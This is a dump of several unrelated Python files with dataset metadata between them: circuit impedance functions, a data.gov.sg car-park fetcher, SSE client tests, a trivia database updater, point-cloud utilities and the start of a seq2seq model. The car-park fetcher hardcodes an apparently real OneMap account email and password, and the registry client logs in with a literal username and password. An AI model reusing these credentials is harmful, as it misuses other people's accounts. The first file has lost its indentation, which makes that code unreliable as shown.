def RaQaRaQRbbb(w, R0, Q0_pair, R1, Q1_pair, R2):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + ( 1 / ( R1 + ( 1 / ( 1/Q(w, q=Q1_pair[0],n=Q1_pair[1]) + 1/R2)))) )
return z
# ------------------ ECMs are not numbered ------------------
# DPFC: ECM-10 R0(C0R1)(C1(R2W0))
def RaCRbaCaRWbb(w, R0, C0, R1, C1, R2, W0):
z = R0 + 1/(1/R1 + 1j * w * C0) + 1 / (1j * w * C1 + 1/(R2 + WB(w, sigma=W0)))
return z
# DPFC: ECM-11 R0(C0R1(R2W0))(Q0R3)
def RaCRaRWbbaQRb(w, R0, C0, R1, R2, W0, Q0_pair, R3):
z = R0 + 1 / (1j * w * C0 + 1/R1 + 1 / (R2 + WB(w, sigma=W0)) ) + 1 / (1 / Q(w, q=Q0_pair[0], n=Q0_pair[1]) + 1/R3)
return z
# ------------------ ECMs are not numbered ------------------
#NEW RULE: ecm_2(two element)_001(Sequence)
#ecm_2_001 R0R1
def RR(R0,R1):
z = R0 + R1
return z
#ecm_2_002 (R0R1)
def aRRb(R0,R1):
z = 1 / (1 / R0 + 1 / R1)
return z
#ecm_2_003 R0L0
def RL(w,R0,L0):
z = R0 + L(w, L0)
return z
#ecm_2_004 (R0L0)
def aRLb(w,R0,L0):
z = 1 / (1 / R0 + 1/(L(w, L0) ))
return z
#ecm_2_005 R0C0
def RC(w, R0, C0):
    z = R0 + 1 / (1j * w * C0)
return z
#ecm_2_006 (R0C0)
def aRCb(w, R0, C0):
z = 1 / (1 / R0 + 1j * w * C0)
return z
#ecm_3_001 R0R1R2
def RRR(R0,R1,R2):
z = R0 + R1 + R2
return z
#ecm_3_002 R0(R1R2)
def RaRRb(R0,R1,R2):
z = 1 / (1 / R1 + 1 / R2) + R0
return z
#ecm_3_003 (R0R1R2)
def aRRRb(R0,R1,R2):
z = 1 / (1 / R0 + 1 / R1 + 1 / R2)
return z
#ecm_3_004 R0R1L0
def RRL(w, R0,R1,L0):
z = R0 + R1 + L(w, L0)
return z
#ecm_3_005 R0(R1L0)
def RaRLb(w,R0,R1,L0):
z = R0 + 1 / (1 / L(w, L0) + 1 / R1)
return z
#ecm_3_006 (R0R1)L0
def aRRbL(w,R0,R1,L0):
z = 1 / (1 / R0 + 1 / R1) + L(w, L0)
return z
#ecm_3_007 (R0R1L0)
def aRRLb(w,R0,R1,L0):
z = 1 / (1 / R0 + 1 / R1 + 1 / L(w, L0))
return z
#ecm_3_008 R0L0L1
def RLL(w,R0,L0,L1):
z = R0 + L(w, L0) + L(w, L1)
return z
#ecm_3_009 R0(L0L1)
def RaLLb(w,R0,L0,L1):
z = R0 + 1/(1 / L(w, L0) + 1 / L(w, L1))
return z
#ecm_3_010 (R0L0L1)
def aRLLb(w,R0,L0,L1):
z = 1 / (1 / L(w, L0) + 1 / L(w, L1) + 1 / R0)
return z
#ecm_3_011 (R0L0)L1
def aRLbL(w,R0,L0,L1):
z = 1 / (1 / L(w, L0) + 1 / R0) + L(w, L1)
return z
#ecm_3_012 R0R1C0
def RRC(w, R0,R1,C0):
    z = R0 + R1 + 1 / (1j * w * C0)
return z
#ecm_3_013 (R0R1)C0
def aRRbC(w, R0,R1,C0):
    z = 1 / (1 / R0 + 1 / R1) + 1 / (1j * w * C0)
return z
#ecm_3_014 R0(R1C0)
def RaRCb(w, R0,R1,C0):
z = 1 / (1 / R1 + 1j * w * C0) + R0
return z
#ecm_3_015 (R0R1C0)
def aRRCb(w, R0,R1,C0):
z = 1 / (1 / R0 + 1 / R1 + 1j * w * C0)
return z
#ecm_3_016 R0C0C1
def RCC(w, R0,C0,C1):
    z = R0 + 1 / (1j * w * C1) + 1 / (1j * w * C0)
return z
#ecm_3_017 (R0C0)C1
def aRCbC(w, R0,C0,C1):
    z = 1 / (1 / R0 + 1j * w * C0) + 1 / (1j * w * C1)
return z
#ecm_3_018 R0(C0C1)
def RaCCb(w, R0,C0,C1):
z = R0 + 1 / (1j * w * C0 + 1j * w * C1)
return z
#ecm_3_019 (R0C0C1)
def aRCCb(w, R0,C0,C1):
z = 1 / (1 / R0 + 1j * w * C0 + 1j * w * C1)
return z
#ecm_3_020 R0R1Q0
def RRQ(w, R0,R1,Q0_pair):
z = R0 + R1 + Q(w, q = Q0_pair[0], n = Q0_pair[1])
return z
#ecm_3_021 (R0R1)Q0
def aRRbQ(w, R0, R1, Q0_pair):
z = 1 / (1 / R0 + 1 / R1) + Q(w, q = Q0_pair[0], n = Q0_pair[1])
return z
#ecm_3_022 R0(R1Q0)
def RaRQb(w, R0,R1,Q0_pair):
z = R0 + 1 / (1 / R1 + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1]))
return z
#ecm_3_023 (R0R1Q0)
def aRRQb(w, R0,R1,Q0_pair):
z = 1 / (1 / R0 + 1 / R1 + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1]))
return z
#ecm_3_024 R0Q0Q1
def RQQ(w, R0,Q0_pair,Q1_pair):
z = R0 + Q(w, q = Q0_pair[0], n = Q0_pair[1]) + Q(w, q = Q1_pair[0], n = Q1_pair[1])
return z
#ecm_3_025 (R0Q0)Q1
def aRQbQ(w, R0, Q0_pair, Q1_pair):
z = 1 / (1 / R0 + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1])) + Q(w, q = Q1_pair[0], n = Q1_pair[1])
return z
#ecm_3_026 R0(Q0Q1)
def RaQQb(w, R0, Q0_pair, Q1_pair):
z = R0 + 1 / (1 / Q(w, q = Q1_pair[0], n = Q1_pair[1]) + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1]))
return z
#ecm_3_027 CCQ
#ecm_3_028 C(CQ)
#ecm_3_029 (CCQ)
#ecm_3_030 (CC)Q
#ecm_3_031 CQQ
#ecm_3_032 C(QQ)
#ecm_3_033 Q(CQ)
#ecm_3_034 (CQQ)
# ------------------ ECMs are not numbered ------------------
| 26.317406
| 126
| 0.489171
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,877
| 0.366264
|
8bb6d2bd0e69ae1dc3728d097c16522641fbedbf
| 1,155
|
py
|
Python
|
devlib/exception.py
|
BayLibre/devlib
|
efa0ecdfe931caebc9a7dab16bb172b96c3f92cb
|
[
"Apache-2.0"
] | 1
|
2021-06-19T09:32:50.000Z
|
2021-06-19T09:32:50.000Z
|
devlib/exception.py
|
BayLibre/devlib
|
efa0ecdfe931caebc9a7dab16bb172b96c3f92cb
|
[
"Apache-2.0"
] | 1
|
2016-02-08T11:27:34.000Z
|
2016-02-08T11:27:34.000Z
|
devlib/exception.py
|
BayLibre/devlib
|
efa0ecdfe931caebc9a7dab16bb172b96c3f92cb
|
[
"Apache-2.0"
] | 3
|
2015-12-15T11:28:06.000Z
|
2016-03-04T16:36:19.000Z
|
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from devlib.utils.misc import TimeoutError # NOQA pylint: disable=W0611
class DevlibError(Exception):
"""Base class for all Workload Automation exceptions."""
pass
class TargetError(DevlibError):
"""An error has occured on the target"""
pass
class TargetNotRespondingError(DevlibError):
"""The target is unresponsive."""
def __init__(self, target):
super(TargetNotRespondingError, self).__init__('Target {} is not responding.'.format(target))
class HostError(DevlibError):
"""An error has occured on the host"""
pass
| 28.170732
| 101
| 0.732468
| 482
| 0.417316
| 0
| 0
| 0
| 0
| 0
| 0
| 796
| 0.689177
|
8bb84845a4e4ca234bb0e7dc0448fc8b70e6253a
| 843
|
py
|
Python
|
chill/examples/chill/testcases/lu.py
|
CompOpt4Apps/Artifact-DataDepSimplify
|
4fa1bf2bda2902fec50a54ee79ae405a554fc9f4
|
[
"MIT"
] | 5
|
2019-05-20T03:35:41.000Z
|
2021-09-16T22:22:13.000Z
|
chill/examples/chill/testcases/lu.py
|
CompOpt4Apps/Artifact-DataDepSimplify
|
4fa1bf2bda2902fec50a54ee79ae405a554fc9f4
|
[
"MIT"
] | null | null | null |
chill/examples/chill/testcases/lu.py
|
CompOpt4Apps/Artifact-DataDepSimplify
|
4fa1bf2bda2902fec50a54ee79ae405a554fc9f4
|
[
"MIT"
] | null | null | null |
# LAPACK optimization strategy for LU factorization.
from chill import *
source('lu.c')
procedure('lu')
loop(0)
TJ = 64
original()
tile(1, 3, TJ, 1)
split(1, 2, 'L1-L2>=2') #t2-t4>=2
permute(3, 2, [2,4,3]) # mini-LU
permute(1, 2, [3,4,2]) # other than mini-LU
split(1, 2, 'L2>=L1-1') # seperate MM by t4 >= t2-1
# now optimize for TRSM
TK1 = 256
TI1 = 256
TJ1 = 8
UI1 = 1
UJ1 = 1
tile(4, 2, TI1, 2)
split(4, 3, 'L5<=L2-1') #split t10 <= t4-1
tile(4, 5, TK1, 3)
tile(4, 5, TJ1, 4)
datacopy([[4,1]], 4, false, 1)
datacopy([[4,2]], 5)
unroll(4, 5, UI1)
unroll(4, 6, UJ1)
datacopy([[5,1]], 3, false, 1)
# now optimize for MM
TK2 = 256
TI2 = 256
TJ2 = 8
UI2 = 1
UJ2 = 1
tile(1, 4, TK2, 2)
tile(1, 3, TI2, 3)
tile(1, 5, TJ2, 4)
datacopy([[1,1]], 4, false, 1)
datacopy([[1,2]], 5)
unroll(1, 5, UI2)
unroll(1, 6, UJ2)
print_code()
| 17.204082
| 52
| 0.578885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 226
| 0.26809
|
8bb882a476b7069df7988169620b13ea93893010
| 2,204
|
py
|
Python
|
dj_vercereg/client/vercereg_client.py
|
davidath/dj-vercereg
|
d1ae1dba21cab93c759ecf79346bc60c2d88d7a8
|
[
"Apache-2.0"
] | null | null | null |
dj_vercereg/client/vercereg_client.py
|
davidath/dj-vercereg
|
d1ae1dba21cab93c759ecf79346bc60c2d88d7a8
|
[
"Apache-2.0"
] | null | null | null |
dj_vercereg/client/vercereg_client.py
|
davidath/dj-vercereg
|
d1ae1dba21cab93c759ecf79346bc60c2d88d7a8
|
[
"Apache-2.0"
] | 1
|
2022-03-14T13:33:19.000Z
|
2022-03-14T13:33:19.000Z
|
#!/usr/bin/env python
# Copyright 2014 The University of Edinburgh
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import curses
import collections
import argparse
import datetime
import logging
logging.basicConfig()
logger = logging.getLogger('DJREG_CLIENT')
logger.setLevel(logging.INFO)
from vercereg_lib import VerceRegManager
class VerceRegClient:
HISTORY_LENGTH = 5000
history = None
manager = None
def __init__(self):
self.history = collections.deque(maxlen=self.HISTORY_LENGTH)
self.manager = VerceRegManager()
def main():
# TODO: Define and implement commands for the client
# parser = argparse.ArgumentParser(description='Client for the VERCE Registry.')
# parser.add_argument('command', metavar='Command', type=str,
# help='a VERCE Registry command')
manager = VerceRegManager()
manager.login('iraklis', 'iraklis')
logger.info(manager.get_auth_token())
# manager.login('admin', 'admin')
# logger.info(manager.get_auth_token())
# manager.clone(1, 'cloned_wspc'+'@'.join(str(datetime.datetime.now()).split()))
# logger.info(manager.get_pe_spec(1, 'pes', 'MyPE'))
# logger.info(manager.get_pe_spec(1, 'fns', 'Fn1')) # should raise an exception
manager.delete_pe_spec(1, 'libpck', 'LibPE11')
new_pe = manager.register_pe_spec(1, 'libpck', 'LibPE11', descr='Some description for a test PE')
new_conn = manager.add_pe_connection(str(new_pe['id']), kind='IN', name='CnName', stype='str', dtype='DTYPE', comment='My comment', is_array=True, modifiers='one:two')
manager.add_pe_connection(str(new_pe['id']), kind='OUT', name='outconn')
if __name__ == '__main__':
main()
| 32.895522
| 169
| 0.720054
| 204
| 0.092559
| 0
| 0
| 0
| 0
| 0
| 0
| 1,305
| 0.592105
|
8bb96428aea103e57829628f8aba75da646487e4
| 6,803
|
py
|
Python
|
scripts/DailyJob/api_data_fetcher.py
|
SamFangshan/CZ2006CarPark
|
663b0370e7d2e0cbe4d0a7391656a731fc7dac52
|
[
"MIT"
] | 2
|
2020-02-26T03:28:02.000Z
|
2020-04-25T07:03:36.000Z
|
scripts/DailyJob/api_data_fetcher.py
|
SamFangshan/CZ2006CarPark
|
663b0370e7d2e0cbe4d0a7391656a731fc7dac52
|
[
"MIT"
] | null | null | null |
scripts/DailyJob/api_data_fetcher.py
|
SamFangshan/CZ2006CarPark
|
663b0370e7d2e0cbe4d0a7391656a731fc7dac52
|
[
"MIT"
] | null | null | null |
import json
import pandas as pd
import numpy as np
from urllib.request import Request, urlopen
from onemap_converter import OneMapConverter
def load_HDB_carpark():
converter = OneMapConverter('FJIANG003@e.ntu.edu.sg', 'XS4teTdcYz')
# Load HDB Carpark Information
url_HDB_carpark = 'https://data.gov.sg/api/action/datastore_search?resource_id=139a3035-e624-4f56-b63f-89ae28d4ae4c&limit={}'
req_HDB_carpark = Request(url_HDB_carpark.format(1), headers={'User-Agent': 'Mozilla/5.0'})
webpage_HDB_carpark = urlopen(req_HDB_carpark).read()
data_HDB_carpark = json.loads(webpage_HDB_carpark.decode())
no_rec = data_HDB_carpark['result']['total'] # number of HDB Carpark Records
url_HDB_carpark = 'https://data.gov.sg/api/action/datastore_search?resource_id=139a3035-e624-4f56-b63f-89ae28d4ae4c&limit={}'
req_HDB_carpark = Request(url_HDB_carpark.format(no_rec), headers={'User-Agent': 'Mozilla/5.0'})
webpage_HDB_carpark = urlopen(req_HDB_carpark).read()
data_HDB_carpark = json.loads(webpage_HDB_carpark.decode())
# Load HDB Carpark Lots Information
url_HDB_lots_info = 'https://api.data.gov.sg/v1/transport/carpark-availability'
req_HDB_lots_info = Request(url_HDB_lots_info, headers={'User-Agent': 'Mozilla/5.0'})
webpage_HDB_lots_info = urlopen(req_HDB_lots_info).read()
data_HDB_lots_info = json.loads(webpage_HDB_lots_info.decode())
# Load HDB Carpark Information into Pandas Data Frame
short_term_parking = [data_HDB_carpark['result']['records'][i]['short_term_parking'] for i in range(no_rec)]
car_park_type = [data_HDB_carpark['result']['records'][i]['car_park_type'] for i in range(no_rec)]
x_coord = [data_HDB_carpark['result']['records'][i]['x_coord'] for i in range(no_rec)]
y_coord = [data_HDB_carpark['result']['records'][i]['y_coord'] for i in range(no_rec)]
coord = [(x_coord[i], y_coord[i]) for i in range(no_rec)]
coord = [converter.convert(float(coord[i][0]), float(coord[i][1])) for i in range(no_rec)]
x_coord = [coord[i][0] for i in range(no_rec)]
y_coord = [coord[i][1] for i in range(no_rec)]
free_parking = [data_HDB_carpark['result']['records'][i]['free_parking'] for i in range(no_rec)]
gantry_height = [data_HDB_carpark['result']['records'][i]['gantry_height'] for i in range(no_rec)]
car_park_basement = [data_HDB_carpark['result']['records'][i]['car_park_basement'] for i in range(no_rec)]
night_parking = [data_HDB_carpark['result']['records'][i]['night_parking'] for i in range(no_rec)]
address = [data_HDB_carpark['result']['records'][i]['address'] for i in range(no_rec)]
car_park_decks = [data_HDB_carpark['result']['records'][i]['car_park_decks'] for i in range(no_rec)]
car_park_no = [data_HDB_carpark['result']['records'][i]['car_park_no'] for i in range(no_rec)]
type_of_parking_system = [data_HDB_carpark['result']['records'][i]['type_of_parking_system'] for i in range(no_rec)]
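    # (Illustrative aside, not part of the original script: the repeated
    # comprehensions above could be collapsed into one hypothetical helper, e.g.
    #     def column(name):
    #         return [r[name] for r in data_HDB_carpark['result']['records']]
    # which keeps behaviour identical while avoiding the repeated indexing.)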
HDB_carpark = {
'carParkNo': car_park_no,
'address': address,
'xCoord': x_coord,
'yCoord': y_coord,
'carParkType': car_park_type,
'typeOfParkingSystem': type_of_parking_system,
'shortTermParking': short_term_parking,
'freeParking': free_parking,
'nightParking': night_parking,
'carParkDecks': car_park_decks,
'gantryHeight': gantry_height,
'carParkBasement': car_park_basement,
}
HDB_carpark = pd.DataFrame.from_dict(HDB_carpark)
# Load HDB Carpark Lots Information into Pandas Data Frame
HDB_lots_info = {}
for record in data_HDB_lots_info['items'][0]['carpark_data']:
carpark_info = record['carpark_info']
car_lot_num = 0
motor_lot_num = 0
heavy_lot_num = 0
for i in range(len(carpark_info)):
if carpark_info[i]['lot_type'] == 'C':
car_lot_num = carpark_info[i]['total_lots']
elif carpark_info[i]['lot_type'] == 'Y':
motor_lot_num = carpark_info[i]['total_lots']
elif carpark_info[i]['lot_type'] == 'L':
heavy_lot_num = carpark_info[i]['total_lots']
try:
if HDB_lots_info[record['carpark_number']][1] == 0:
HDB_lots_info[record['carpark_number']][1] = car_lot_num
if HDB_lots_info[record['carpark_number']][2] == 0:
HDB_lots_info[record['carpark_number']][2] = motor_lot_num
if HDB_lots_info[record['carpark_number']][3] == 0:
HDB_lots_info[record['carpark_number']][3] = heavy_lot_num
        except KeyError:
HDB_lots_info[record['carpark_number']] = [record['carpark_number'], car_lot_num, motor_lot_num, heavy_lot_num]
HDB_lots_info = dict(zip(range(len(HDB_lots_info)), HDB_lots_info.values()))
columns = ['carParkNo', 'carLotNum', 'motorLotNum', 'heavyLotNum']
HDB_lots_info = pd.DataFrame.from_dict(HDB_lots_info, orient='index', columns=columns)
# Merge two Pandas Data Frames
HDB_carpark = pd.merge(HDB_carpark, HDB_lots_info, on='carParkNo', how='inner')
# Provide rates information
# Information Source:
# https://www.hdb.gov.sg/cs/infoweb/car-parks/short-term-parking/short-term-parking-charges
central = ['HLM', 'KAB', 'KAM', 'KAS', 'PRM', 'SLS', 'SR1', 'SR2', 'TPM', 'UCS']
loading = ['GSML', 'BRBL', 'JCML', 'T55', 'GEML', 'KAML', 'J57L', 'J6OL', 'TPL', 'EPL', 'BL8L']
car_rates = '$0.60 per half-hour'
motor_rates = '$0.20 per half-hour'
heavy_rates = '$1.20 per half-hour'
central_rates = """$1.20 per half-hour
(7:00am to 5:00pm, Monday to Saturday)
$0.60 per half hour
(Other hours)
"""
loading_rates = """Free - First 15 minutes
$2 - first half hour
$4 - subsequent half hour
"""
HDB_carpark['carRates'] = np.where(pd.to_numeric(HDB_carpark['carLotNum']) != 0, car_rates, None)
HDB_carpark['carRates'] = np.where(np.isin(HDB_carpark['carParkNo'], central), central_rates, HDB_carpark['carRates'])
HDB_carpark['motorRates'] = np.where(pd.to_numeric(HDB_carpark['motorLotNum']) != 0, motor_rates, None)
HDB_carpark['heavyRates'] = np.where(pd.to_numeric(HDB_carpark['heavyLotNum']) != 0, heavy_rates, None)
HDB_carpark['carRates'] = np.where(np.isin(HDB_carpark['carParkNo'], loading), loading_rates, HDB_carpark['carRates'])
HDB_carpark['motorRates'] = np.where(np.isin(HDB_carpark['carParkNo'], loading), loading_rates, HDB_carpark['motorRates'])
HDB_carpark['heavyRates'] = np.where(np.isin(HDB_carpark['carParkNo'], loading), loading_rates, HDB_carpark['heavyRates'])
return HDB_carpark
| 58.646552
| 129
| 0.66456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,228
| 0.327503
|
8bba17146d82323f502dee13164e2dcf746f9322
| 4,108
|
py
|
Python
|
tests/push/test_sse.py
|
cfogg/python-client
|
40e6891c8240e6b2acd5df538e622e9f15de43d6
|
[
"Apache-2.0"
] | 13
|
2017-03-17T15:15:20.000Z
|
2022-03-14T22:24:10.000Z
|
tests/push/test_sse.py
|
cfogg/python-client
|
40e6891c8240e6b2acd5df538e622e9f15de43d6
|
[
"Apache-2.0"
] | 81
|
2017-01-12T23:06:48.000Z
|
2022-02-21T18:20:23.000Z
|
tests/push/test_sse.py
|
cfogg/python-client
|
40e6891c8240e6b2acd5df538e622e9f15de43d6
|
[
"Apache-2.0"
] | 14
|
2017-05-25T10:49:13.000Z
|
2021-12-27T16:39:20.000Z
|
"""SSEClient unit tests."""
import time
import threading
import pytest
from splitio.push.sse import SSEClient, SSEEvent
from tests.helpers.mockserver import SSEMockServer
class SSEClientTests(object):
"""SSEClient test cases."""
def test_sse_client_disconnects(self):
"""Test correct initialization. Client ends the connection."""
server = SSEMockServer()
server.start()
events = []
def callback(event):
"""Callback."""
events.append(event)
client = SSEClient(callback)
def runner():
"""SSE client runner thread."""
assert client.start('http://127.0.0.1:' + str(server.port()))
client_task = threading.Thread(target=runner)
client_task.setDaemon(True)
client_task.setName('client')
client_task.start()
with pytest.raises(RuntimeError):
client_task.start()
server.publish({'id': '1'})
server.publish({'id': '2', 'event': 'message', 'data': 'abc'})
server.publish({'id': '3', 'event': 'message', 'data': 'def'})
server.publish({'id': '4', 'event': 'message', 'data': 'ghi'})
time.sleep(1)
client.shutdown()
time.sleep(1)
assert events == [
SSEEvent('1', None, None, None),
SSEEvent('2', 'message', None, 'abc'),
SSEEvent('3', 'message', None, 'def'),
SSEEvent('4', 'message', None, 'ghi')
]
assert client._conn is None
server.publish(server.GRACEFUL_REQUEST_END)
server.stop()
def test_sse_server_disconnects(self):
"""Test correct initialization. Server ends connection."""
server = SSEMockServer()
server.start()
events = []
def callback(event):
"""Callback."""
events.append(event)
client = SSEClient(callback)
def runner():
"""SSE client runner thread."""
assert client.start('http://127.0.0.1:' + str(server.port()))
client_task = threading.Thread(target=runner)
client_task.setDaemon(True)
client_task.setName('client')
client_task.start()
server.publish({'id': '1'})
server.publish({'id': '2', 'event': 'message', 'data': 'abc'})
server.publish({'id': '3', 'event': 'message', 'data': 'def'})
server.publish({'id': '4', 'event': 'message', 'data': 'ghi'})
time.sleep(1)
server.publish(server.GRACEFUL_REQUEST_END)
server.stop()
time.sleep(1)
assert events == [
SSEEvent('1', None, None, None),
SSEEvent('2', 'message', None, 'abc'),
SSEEvent('3', 'message', None, 'def'),
SSEEvent('4', 'message', None, 'ghi')
]
assert client._conn is None
def test_sse_server_disconnects_abruptly(self):
"""Test correct initialization. Server ends connection."""
server = SSEMockServer()
server.start()
events = []
def callback(event):
"""Callback."""
events.append(event)
client = SSEClient(callback)
def runner():
"""SSE client runner thread."""
assert client.start('http://127.0.0.1:' + str(server.port()))
client_task = threading.Thread(target=runner)
client_task.setDaemon(True)
client_task.setName('client')
client_task.start()
server.publish({'id': '1'})
server.publish({'id': '2', 'event': 'message', 'data': 'abc'})
server.publish({'id': '3', 'event': 'message', 'data': 'def'})
server.publish({'id': '4', 'event': 'message', 'data': 'ghi'})
time.sleep(1)
server.publish(server.VIOLENT_REQUEST_END)
server.stop()
time.sleep(1)
assert events == [
SSEEvent('1', None, None, None),
SSEEvent('2', 'message', None, 'abc'),
SSEEvent('3', 'message', None, 'def'),
SSEEvent('4', 'message', None, 'ghi')
]
assert client._conn is None
| 31.844961
| 73
| 0.547955
| 3,933
| 0.9574
| 0
| 0
| 0
| 0
| 0
| 0
| 940
| 0.228822
|
8bbca367e9908a584ebeb0ff48984d79eb8c67ba
| 859
|
py
|
Python
|
api_updater.py
|
jpes707/quiz-api
|
18af31b9cdba8927e4e7a38e0bd3623e938cf7dc
|
[
"MIT"
] | null | null | null |
api_updater.py
|
jpes707/quiz-api
|
18af31b9cdba8927e4e7a38e0bd3623e938cf7dc
|
[
"MIT"
] | null | null | null |
api_updater.py
|
jpes707/quiz-api
|
18af31b9cdba8927e4e7a38e0bd3623e938cf7dc
|
[
"MIT"
] | null | null | null |
import os
from mongo_config import questions_collection, client
def get_relative_path(*args):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), *args)
questions_collection.delete_many({}) # clears all questions in MongoDB
question_objects = []
lines = [line[:-1] for line in open(get_relative_path('trivia.txt'), 'r').readlines()] + ['']
for idx in range(0, len(lines), 6):
question = lines[idx]
correct_answer = lines[idx + 1]
wrong_answers = lines[idx + 2 : idx + 5]
choices = [correct_answer] + wrong_answers # not shuffled yet
question_object = {'question': question, 'correct_answer': correct_answer, 'choices': choices}
question_objects.append(question_object)
questions_collection.insert_many(question_objects) # puts all questions from txt file into MongoDB
client.close()
print('Questions updated!')
| 37.347826
| 99
| 0.733411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.197905
|
8bbcec0ab14f44786258536c11d18bbc453834f6
| 2,429
|
py
|
Python
|
util.py
|
AndreasWieg/PC-BIGAN
|
0738f9bf56bd30b43eb2db9765ce9bae25ca81f6
|
[
"MIT"
] | null | null | null |
util.py
|
AndreasWieg/PC-BIGAN
|
0738f9bf56bd30b43eb2db9765ce9bae25ca81f6
|
[
"MIT"
] | null | null | null |
util.py
|
AndreasWieg/PC-BIGAN
|
0738f9bf56bd30b43eb2db9765ce9bae25ca81f6
|
[
"MIT"
] | null | null | null |
import numpy as np
import random
from plyfile import PlyData, PlyElement
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from pyntcloud import PyntCloud
import os
import sys
import re
def shuffle_data(training_data):
np.random.shuffle(training_data)
return training_data
def save_pointcloud(leaf,counter,leaf_name,number_points):
leaf = np.asarray(leaf)
leaf = np.reshape(leaf,(number_points,3))
leaf_final = []
    for row in leaf:
        leaf_final.append(tuple(row))
vertex = np.array(leaf_final,dtype=[('x', 'f4'), ('y', 'f4'),('z', 'f4')])
el = PlyElement.describe(vertex, 'vertex')
PlyData([el]).write('%s_%d.ply' % (leaf_name,counter))
def load_data(number_points,reduction_step):
training_data = []
#counter = 1
for file in os.listdir("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % (reduction_step)):
if file.endswith(".ply"):
cloud = PyntCloud.from_file("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d/%s" % (reduction_step,file))
cloud_array = np.asarray(cloud.points)
training_data.append(cloud_array)
return training_data
def load_data_table(number_points,reduction_step):
training_data = []
counter = 1
if not os.path.exists("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % reduction_step):
os.mkdir("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % reduction_step)
table_uri = ("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % reduction_step)
print(table_uri)
for file in os.listdir("C:/Users/Andreas/Desktop/PG-PGGAN/table"):
if file.endswith(".ply"):
cloud = PyntCloud.from_file("C:/Users/Andreas/Desktop/PG-PGGAN/table/%s" % file)
cloud = cloud.get_sample(name="points_random",n = number_points)
cloud = PyntCloud(cloud)
cloud_array = np.asarray(cloud.points)
cloud.to_file(table_uri + "/out_file_%d.ply" % (counter))
counter = counter + 1
training_data.append(cloud_array)
else:
training_data = load_data(number_points,reduction_step)
print(len(training_data))
print("data loaded")
training_data = np.asarray(training_data)
print("getting Trainingdata into the right format")
#training_data = training_data.reshape(8509,3072)
print(training_data.shape)
print(" trainingdata formated")
return training_data
| 37.369231
| 107
| 0.691231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 555
| 0.228489
|
8bbd00b53513bf84f5c58a5ce90fbc7b1806da00
| 7,474
|
py
|
Python
|
seq_to_seq.py
|
jlibovicky/char-nmt-two-step-decoder
|
3fa90c38556f23568f6b88eb98e4bc2193f3b744
|
[
"BSD-3-Clause"
] | null | null | null |
seq_to_seq.py
|
jlibovicky/char-nmt-two-step-decoder
|
3fa90c38556f23568f6b88eb98e4bc2193f3b744
|
[
"BSD-3-Clause"
] | null | null | null |
seq_to_seq.py
|
jlibovicky/char-nmt-two-step-decoder
|
3fa90c38556f23568f6b88eb98e4bc2193f3b744
|
[
"BSD-3-Clause"
] | null | null | null |
"""Encoder-decoder model."""
from typing import List, Tuple, Union
import torch
import torch.nn as nn
from encoder import Encoder, VanillaEncoder
from decoder import Decoder, VanillaDecoder
T = torch.Tensor
def compute_attention_entropy(
att_matrix: T, query_mask: T) -> float:
# att matrix is: batch x heads x q_len x k_len
# first entropy of each distribution, non-existing key positions
    # must be masked out
prenorm_entropies = -(torch.log(att_matrix) * att_matrix)
prenorm_entropies[prenorm_entropies.isnan()] = 0.0
distr_entropies = prenorm_entropies.sum(3)
# shape: batch x head x q_len
# now average over relevant query positions
batch_head_entropies = (
distr_entropies * query_mask.unsqueeze(1)).sum(2) / query_mask.sum()
return batch_head_entropies.mean(0).mean(0).cpu().numpy()
class Seq2SeqModel(nn.Module):
def __init__(
self, vocab_size: Union[int, Tuple[int, int]],
conv_filters: List[int],
nar_output: bool = False,
char_embedding_dim: int = 128,
dim: int = 512,
shrink_factor: int = 5,
charformer_block_size: int = 5,
highway_layers: int = 2,
char_ff_layers: int = 2,
ff_dim: int = None,
layers: int = 6,
attention_heads: int = 8,
dropout: float = 0.1,
char_process_type: str = "conv",
vanilla_encoder: bool = False,
vanilla_decoder: bool = False,
share_char_repr: bool = False) -> None:
super().__init__()
self.layers = layers
if isinstance(vocab_size, tuple):
src_vocab_size, tgt_vocab_size = vocab_size
else:
src_vocab_size, tgt_vocab_size = vocab_size, vocab_size
if vanilla_encoder:
self.encoder: Union[Encoder, VanillaEncoder] = VanillaEncoder(
char_vocabulary_size=src_vocab_size,
dim=dim,
layers=layers,
ff_dim=ff_dim,
attention_heads=attention_heads,
dropout=dropout)
else:
self.encoder = Encoder(
vocab_size=src_vocab_size,
char_embedding_dim=char_embedding_dim,
conv_filters=conv_filters,
dim=dim,
shrink_factor=shrink_factor,
charformer_block_size=charformer_block_size,
highway_layers=highway_layers,
char_ff_layers=char_ff_layers,
ff_dim=ff_dim, layers=layers,
attention_heads=attention_heads,
dropout=dropout,
decoder_style_padding=share_char_repr,
char_process_type=char_process_type)
if vanilla_decoder:
